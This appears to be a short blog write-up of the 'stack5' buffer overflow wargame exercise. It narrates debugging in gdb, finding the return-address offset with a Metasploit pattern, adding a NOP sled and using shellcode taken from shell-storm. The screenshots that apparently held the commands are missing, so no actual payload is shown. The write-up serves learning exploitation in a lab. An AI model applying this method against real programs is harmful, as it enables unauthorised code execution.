Today we will start here:
As you can see we have buffer to overflow, let's try to do that :) Running the program just to check it in action:
Now let's open stack5 in gdb:
As you can see I like to set up 2 more options when using gdb:
- set disassembly-flavor intel
- set pagination off
Reading the listing we can see that there is a leave instruction (in main+21), let's break (b) there. Running with our 'payload' (from /tmp/x1) and we are here:
Next we will check where is our payload in ESP:
Next I decided to prepare a new payload this time using Metasploit's
Restarting the app with new payload:
So far, so good. Our payload is available in ESP, type c(ontinue) to proceed:
Now it should be easier to get the offset:
Checking with new payload:
Looking for the address we will overwrite:
So now, adding NOPs:
Last stage, preparing shellcode: we will use the one I found on shell-storm:
Not yet, fixing:
Cool. :) Next?
See you soon...
Cheers
Brak komentarzy:
Prześlij komentarz